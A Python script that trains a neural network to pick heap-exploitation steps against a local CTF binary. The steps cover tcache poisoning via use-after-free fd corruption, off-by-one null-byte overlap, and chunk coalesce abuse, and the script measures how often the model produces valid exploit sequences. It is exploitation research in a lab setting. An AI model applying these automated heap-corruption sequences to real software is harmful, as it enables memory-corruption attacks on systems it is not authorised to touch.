#!/usr/bin/env python3
"""multi_technique.py - Train one model on multiple exploit techniques.

Techniques:
  1. Tcache poison (UAF fd corruption):           M+ F F W_UAF M+
  2. Off-by-one overlap (null byte overflow):     M M M W_OVF F M
  3. Coalesce abuse (free adjacent, alloc large): M M M F F M_large

Action space (4 ops):
  0: MALLOC
  1: FREE
  2: WRITE_UAF      (edit freed chunk - corrupt fd pointer)
  3: WRITE_OVERFLOW (edit allocated chunk with max data - triggers off-by-one)

The model must learn WHICH technique to apply based on heap state.
"""
import sys
import os
import json
import subprocess
import tempfile
import time
import random
import re

import numpy as np
import torch
import torch.nn.functional as F
from pathlib import Path

ROOT = Path(__file__).resolve().parent.parent
sys.path.insert(0, str(ROOT / "agent"))
sys.path.insert(0, str(ROOT / "model"))

from universal_grid import UniversalGridEncoder
from trm_heap import RMSNorm, SwiGLU, RecursionBlock

BINARY = ROOT / "ctf" / "vuln_heap"
HARNESS = ROOT / "harness" / "heapgrid_harness.so"
DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu")

# Op indices predicted by the model (4-way classification head).
OP_MALLOC = 0
OP_FREE = 1
OP_WRITE_UAF = 2
OP_WRITE_OVF = 3
N_OPS = 4

# Request sizes offered to the allocator during sequence generation.
SIZES = [0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x78, 0x80]


class MultiTechTRM(torch.nn.Module):
    """TRM for 4-class technique-aware op prediction.

    Embeds the (flattened) heap grid, refines two latent streams (z, y)
    through nested recursion blocks, mean-pools the y stream, and maps it
    to N_OPS logits.
    """

    def __init__(self, vocab_size=64, hidden_dim=128, seq_len=512,
                 n_outer=2, n_inner=3):
        super().__init__()
        self.embed = torch.nn.Embedding(vocab_size, hidden_dim)
        # Learned initial states for the two recursion streams.
        self.y_init = torch.nn.Parameter(torch.randn(1, seq_len, hidden_dim) * 0.02)
        self.z_init = torch.nn.Parameter(torch.randn(1, seq_len, hidden_dim) * 0.02)
        self.block_z = RecursionBlock(hidden_dim)
        self.block_y = RecursionBlock(hidden_dim)
        self.pos_embed = torch.nn.Parameter(torch.randn(1, seq_len, hidden_dim) * 0.02)
        self.out_norm = RMSNorm(hidden_dim)
        self.n_outer = n_outer
        self.n_inner = n_inner
        self.head = torch.nn.Linear(hidden_dim, N_OPS)

    def forward(self, x):
        """Return (B, N_OPS) logits for a batch of integer grid tensors.

        x is flattened to (B, seq_len); its token count must match the
        seq_len the positional/initial parameters were built with.
        """
        B = x.shape[0]
        h = self.embed(x.reshape(B, -1)) + self.pos_embed
        y = self.y_init.expand(B, -1, -1)
        z = self.z_init.expand(B, -1, -1)
        for _ in range(self.n_outer):
            # Inner loop refines z against the input; outer loop folds z into y.
            for _ in range(self.n_inner):
                z = z + self.block_z(h + y + z)
            y = y + self.block_y(y + z)
        pooled = self.out_norm(y).mean(dim=1)
        return self.head(pooled)


def run_and_dump(commands):
    """Run the target binary under the harness and collect JSONL heap states.

    commands: list of textual commands fed to the binary's stdin; a final
    "5" (quit) is appended automatically.
    Returns the list of per-operation state dicts dumped by the harness.
    """
    # mkstemp instead of the race-prone, deprecated tempfile.mktemp.
    fd, dump_path = tempfile.mkstemp(suffix=".jsonl")
    os.close(fd)
    env = os.environ.copy()
    env["LD_PRELOAD"] = str(HARNESS)
    env["HEAPGRID_OUT"] = dump_path
    states = []
    try:
        subprocess.run([str(BINARY)],
                       input=("\n".join(commands) + "\n5\n").encode(),
                       env=env, capture_output=True, timeout=10)
        if os.path.exists(dump_path):
            with open(dump_path) as f:
                for line in f:
                    if line.strip():
                        states.append(json.loads(line.strip()))
    finally:
        # Always remove the dump file, even if the run or parse failed.
        if os.path.exists(dump_path):
            os.unlink(dump_path)
    return states


# ============================================================
# TECHNIQUE 1: Tcache poison (UAF fd write)
# Pattern: M+ F F W_UAF M+
# ============================================================
def gen_tcache_poison(n_pre=None):
    """Generate a tcache-poison command sequence plus per-step op labels."""
    size = random.choice([s for s in SIZES if s <= 0x70])  # tcache sizes
    slots = random.sample(range(16), 8)
    if n_pre is None:
        n_pre = random.randint(2, 5)
    commands, labels = [], []
    alloc_slots = []
    for i in range(n_pre):
        commands.append(f"1 {slots[i]} {size}")
        labels.append(OP_MALLOC)
        alloc_slots.append(slots[i])
    targets = random.sample(alloc_slots, 2)
    for s in targets:
        commands.append(f"4 {s}")
        labels.append(OP_FREE)
    # UAF write: edit freed chunk (corrupts the tcache fd pointer).
    commands.append(f"2 {targets[1]} {'41' * 8}")
    labels.append(OP_WRITE_UAF)
    # Drain allocations to pull the poisoned chunk back out.
    drain = [s for s in slots if s not in alloc_slots][:2]
    for s in drain:
        commands.append(f"1 {s} {size}")
        labels.append(OP_MALLOC)
    return commands, labels, "tcache_poison"


# ============================================================
# TECHNIQUE 2: Off-by-one null byte overlap
# Pattern: M M M W_OVF F M
# Alloc 3 adjacent chunks, overflow A into B, free B (corrupted size),
# alloc over it.
# ============================================================
def gen_off_by_one():
    """Generate an off-by-one (null byte) overlap sequence plus labels."""
    size = 0x78  # max size before rounding - null byte overflows into next chunk
    slots = random.sample(range(16), 6)
    commands, labels = [], []
    # Alloc 3 adjacent: A, B, C
    for i in range(3):
        commands.append(f"1 {slots[i]} {size}")
        labels.append(OP_MALLOC)
    # Overflow A: write full 0x78 bytes, null byte hits B's prev_inuse.
    commands.append(f"2 {slots[0]} {'41' * size}")
    labels.append(OP_WRITE_OVF)
    # Free B (with corrupted size).
    commands.append(f"4 {slots[1]}")
    labels.append(OP_FREE)
    # Alloc over corrupted region.
    commands.append(f"1 {slots[3]} {size}")
    labels.append(OP_MALLOC)
    return commands, labels, "off_by_one"


# ============================================================
# TECHNIQUE 3: Coalesce confusion
# Pattern: M M M F F M(larger) - free two adjacent, alloc large to get overlap
# ============================================================
def gen_coalesce():
    """Generate a coalesce-abuse sequence plus labels."""
    small = random.choice([0x30, 0x40, 0x50])
    slots = random.sample(range(16), 7)
    commands, labels = [], []
    n_pre = random.randint(3, 5)
    for i in range(n_pre):
        commands.append(f"1 {slots[i]} {small}")
        labels.append(OP_MALLOC)
    # Free two adjacent chunks (indices 1 and 2 should be adjacent).
    commands.append(f"4 {slots[1]}")
    labels.append(OP_FREE)
    commands.append(f"4 {slots[2]}")
    labels.append(OP_FREE)
    # Alloc larger chunk that overlaps the coalesced region.
    big = small * 2 + 0x10
    if big > 0x80:
        big = 0x80
    commands.append(f"1 {slots[n_pre]} {big}")
    labels.append(OP_MALLOC)
    return commands, labels, "coalesce"


# ============================================================
# BENIGN sequences
# ============================================================
def gen_benign():
    """Generate a random, non-exploitative malloc/free sequence plus labels."""
    n_ops = random.randint(4, 12)
    commands, labels = [], []
    allocated = {}
    for _ in range(n_ops):
        # Bias toward allocation (and force it when nothing is allocated).
        if not allocated or random.random() < 0.55:
            free_s = [s for s in range(16) if s not in allocated]
            if not free_s:
                break
            s = random.choice(free_s)
            sz = random.choice(SIZES)
            commands.append(f"1 {s} {sz}")
            labels.append(OP_MALLOC)
            allocated[s] = sz
        else:
            s = random.choice(list(allocated.keys()))
            commands.append(f"4 {s}")
            labels.append(OP_FREE)
            del allocated[s]
    return commands, labels, "benign"


# ============================================================
# DATA COLLECTION
# ============================================================
def collect_data(n_per_technique=200, n_benign=300):
    """Run generated sequences against the real binary and build a dataset.

    Returns (X, y): stacked encoded grids and int64 next-op labels derived
    from technique-specific phase rules (what SHOULD happen next).
    """
    all_grids, all_labels = [], []
    technique_counts = {}
    generators = [
        ("tcache_poison", gen_tcache_poison, n_per_technique),
        ("off_by_one", gen_off_by_one, n_per_technique),
        ("coalesce", gen_coalesce, n_per_technique),
        ("benign", gen_benign, n_benign),
    ]
    for tech_name, gen_fn, count in generators:
        print(f"  Generating {count} {tech_name}...")
        n_ok = 0
        for _ in range(count):
            commands, op_labels, _ = gen_fn()
            states = run_and_dump(commands)
            if len(states) < 2:
                continue
            encoder = UniversalGridEncoder()
            # Phase-based labeling (what should happen NEXT).
            n_free_seen = 0
            write_done = False
            for j, state in enumerate(states):
                op = state.get("operation", "malloc")
                if "free" in op.lower():
                    n_free_seen += 1
                chunks = state.get("chunks", [])
                n_alloc = sum(1 for c in chunks if c.get("state") == 1)
                # Determine next label based on technique.
                if tech_name == "tcache_poison":
                    if n_free_seen == 0:
                        label = OP_FREE if (n_alloc >= 2 and j >= len(states) * 0.3) else OP_MALLOC
                    elif n_free_seen >= 2 and not write_done:
                        label = OP_WRITE_UAF
                        write_done = True
                    else:
                        label = OP_MALLOC
                elif tech_name == "off_by_one":
                    if n_alloc >= 3 and n_free_seen == 0 and not write_done:
                        label = OP_WRITE_OVF
                        write_done = True
                    elif write_done and n_free_seen == 0:
                        label = OP_FREE
                    elif n_free_seen >= 1 and write_done:
                        label = OP_MALLOC
                    else:
                        label = OP_MALLOC
                elif tech_name == "coalesce":
                    if n_free_seen == 0 and n_alloc >= 3:
                        label = OP_FREE
                    elif n_free_seen == 1:
                        label = OP_FREE  # free second adjacent
                    elif n_free_seen >= 2:
                        label = OP_MALLOC  # alloc large
                    else:
                        label = OP_MALLOC
                else:  # benign: label with the actually-observed next op
                    if j + 1 < len(states):
                        next_op = states[j + 1].get("operation", "malloc")
                        label = OP_FREE if "free" in next_op.lower() else OP_MALLOC
                    else:
                        label = OP_MALLOC
                grid = encoder.encode(state)
                all_grids.append(grid)
                all_labels.append(label)
                actual_op = OP_FREE if "free" in op.lower() else OP_MALLOC
                encoder.record_action(actual_op, state.get("target_size", 0))
            n_ok += 1
        technique_counts[tech_name] = n_ok
    print(f"  Technique counts: {technique_counts}")
    return np.stack(all_grids), np.array(all_labels, dtype=np.int64)


def train_gpu(model, X, y, epochs=300, lr=1e-3, bs=128):
    """Train the model with AdamW + cosine LR schedule, printing progress."""
    model.to(DEVICE)
    opt = torch.optim.AdamW(model.parameters(), lr=lr, weight_decay=0.01)
    sched = torch.optim.lr_scheduler.CosineAnnealingLR(opt, T_max=epochs)
    X_t = torch.from_numpy(X).long().to(DEVICE)
    y_t = torch.from_numpy(y).long().to(DEVICE)
    n = len(X_t)
    for ep in range(1, epochs + 1):
        model.train()
        perm = torch.randperm(n, device=DEVICE)
        total_loss = correct = nb = 0
        for i in range(0, n, bs):
            idx = perm[i:i + bs]
            logits = model(X_t[idx])
            loss = F.cross_entropy(logits, y_t[idx])
            opt.zero_grad()
            loss.backward()
            torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)
            opt.step()
            total_loss += loss.item()
            correct += (logits.argmax(1) == y_t[idx]).sum().item()
            nb += 1
        sched.step()
        if ep % 25 == 0 or ep == 1:
            print(f"  Epoch {ep:3d} | loss={total_loss/nb:.4f} | acc={correct/n:.3f}")


def evaluate_live(model, n_trials=50, temperature=0.3):
    """Evaluate with hybrid policy: TRM picks op, rules handle W timing.

    Drives the live binary interactively for up to 20 steps per trial,
    sampling ops from the model's tempered softmax, and scores how often
    UAF/overflow writes and valid exploit sequences were produced.
    """
    model.eval().to(DEVICE)
    results = {"uaf": 0, "ovf": 0, "correct_seq": 0, "seqs": []}
    for trial in range(n_trials):
        # mkstemp instead of the race-prone, deprecated tempfile.mktemp.
        fd, dump_path = tempfile.mkstemp(suffix=".jsonl")
        os.close(fd)
        env = os.environ.copy()
        env["LD_PRELOAD"] = str(HARNESS)
        env["HEAPGRID_OUT"] = dump_path
        proc = subprocess.Popen([str(BINARY)], stdin=subprocess.PIPE,
                                stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                                env=env)
        encoder = UniversalGridEncoder()
        slots, freed, ops = {}, set(), []
        did_uaf = did_ovf = False
        for step in range(20):
            time.sleep(0.01)  # give the harness time to flush the dump
            state = {"chunks": []}
            try:
                with open(dump_path) as f:
                    lines = f.readlines()
                if lines:
                    state = json.loads(lines[-1].strip())
            except (OSError, json.JSONDecodeError):
                pass  # best-effort: fall back to an empty heap state
            grid = encoder.encode(state)
            x = torch.from_numpy(grid).long().unsqueeze(0).to(DEVICE)
            with torch.no_grad():
                logits = model(x)
                probs = F.softmax(logits / temperature, dim=1)
                op = torch.multinomial(probs, 1).item()
            # Rule overrides for W timing.
            if op == OP_WRITE_UAF and not freed:
                op = OP_MALLOC  # can't UAF without freed chunks
            if op == OP_WRITE_OVF and not any(v for v in slots.values()):
                op = OP_MALLOC  # need allocated chunks
            # NOTE(review): data generation uses 16 slots but eval only 8 -
            # confirm this mismatch is intentional.
            free_s = [s for s in range(8) if s not in slots]
            alloc_s = [s for s, v in slots.items() if v and s not in freed]
            cmd = None
            size = 0
            if op == OP_MALLOC and free_s:
                s = random.choice(free_s)
                size = random.choice(SIZES)
                cmd = f"1 {s} {size}"
                slots[s] = True
                ops.append("M")
            elif op == OP_FREE and alloc_s:
                s = random.choice(alloc_s)
                cmd = f"4 {s}"
                slots[s] = False
                freed.add(s)
                ops.append("F")
            elif op == OP_WRITE_UAF and freed:
                s = random.choice(list(freed))
                cmd = f"2 {s} {'41' * 8}"
                did_uaf = True
                ops.append("U")
            elif op == OP_WRITE_OVF and alloc_s:
                s = random.choice(alloc_s)
                cmd = f"2 {s} {'41' * 0x78}"  # max write triggers off-by-one
                did_ovf = True
                ops.append("O")
            else:
                ops.append("x")  # op was not executable in this state
            if cmd:
                proc.stdin.write((cmd + "\n").encode())
                proc.stdin.flush()
                encoder.record_action(op, size)
        try:
            proc.stdin.write(b"5\n")
            proc.stdin.flush()
            proc.wait(timeout=2)
        except (OSError, subprocess.TimeoutExpired):
            proc.kill()
        # Check results: did any chunk's fd get the poisoned 'AAAAAAAA' value?
        if did_uaf:
            try:
                with open(dump_path) as f:
                    poisoned = False
                    for line in f:
                        st = json.loads(line.strip())
                        for c in st.get("chunks", []):
                            if c.get("fd", 0) == 0x4141414141414141:
                                results["uaf"] += 1
                                poisoned = True
                                break
                        if poisoned:
                            break
            except (OSError, json.JSONDecodeError):
                pass
        if did_ovf:
            results["ovf"] += 1
        seq = "".join(ops)
        # Valid patterns: M+F+U (tcache poison), M+OF+M (off-by-one),
        # M+FF+M (coalesce) - skips ("x") are ignored.
        compact = seq.replace("x", "")
        if re.search(r"M+F+U", compact) or \
           re.search(r"M+OF+M", compact) or \
           re.search(r"M+FF+M", compact):
            results["correct_seq"] += 1
        results["seqs"].append(seq)
        if os.path.exists(dump_path):
            os.unlink(dump_path)
    return results


def main():
    print(f"Device: {DEVICE}")
    print("\n=== Collecting multi-technique data ===")
    X, y = collect_data(n_per_technique=300, n_benign=300)
    print(f"Data: {len(X)} samples | M={sum(y==0)} F={sum(y==1)} U={sum(y==2)} O={sum(y==3)}")

    print("\n=== Training on GPU ===")
    model = MultiTechTRM(hidden_dim=128, n_outer=2, n_inner=3)
    print(f"Params: {sum(p.numel() for p in model.parameters()):,}")
    train_gpu(model, X, y, epochs=300, lr=1e-3, bs=128)

    print("\n=== Live evaluation (50 trials) ===")
    results = evaluate_live(model, n_trials=50, temperature=0.3)
    print(f"UAF writes achieved: {results['uaf']}/50 ({results['uaf']*2}%)")
    print(f"Overflow writes: {results['ovf']}/50 ({results['ovf']*2}%)")
    print(f"Valid exploit sequences: {results['correct_seq']}/50 ({results['correct_seq']*2}%)")
    print("\nOp distribution in sequences:")
    all_ops = "".join(results["seqs"])
    for ch, name in [("M", "malloc"), ("F", "free"), ("U", "uaf_write"),
                     ("O", "overflow"), ("x", "skip")]:
        print(f"  {name}: {all_ops.count(ch)}")
    print("\nSample sequences:")
    for s in results["seqs"][:15]:
        print(f"  {s}")
    # Per-technique analysis.
    print("\nPer-technique breakdown:")
    has_uaf = sum(1 for s in results["seqs"] if "U" in s)
    has_ovf = sum(1 for s in results["seqs"] if "O" in s)
    has_both = sum(1 for s in results["seqs"] if "U" in s and "O" in s)
    neither = sum(1 for s in results["seqs"] if "U" not in s and "O" not in s)
    print(f"  Used tcache poison (U): {has_uaf}/50")
    print(f"  Used off-by-one (O): {has_ovf}/50")
    print(f"  Used both: {has_both}/50")
    print(f"  Used neither: {neither}/50")


if __name__ == "__main__":
    main()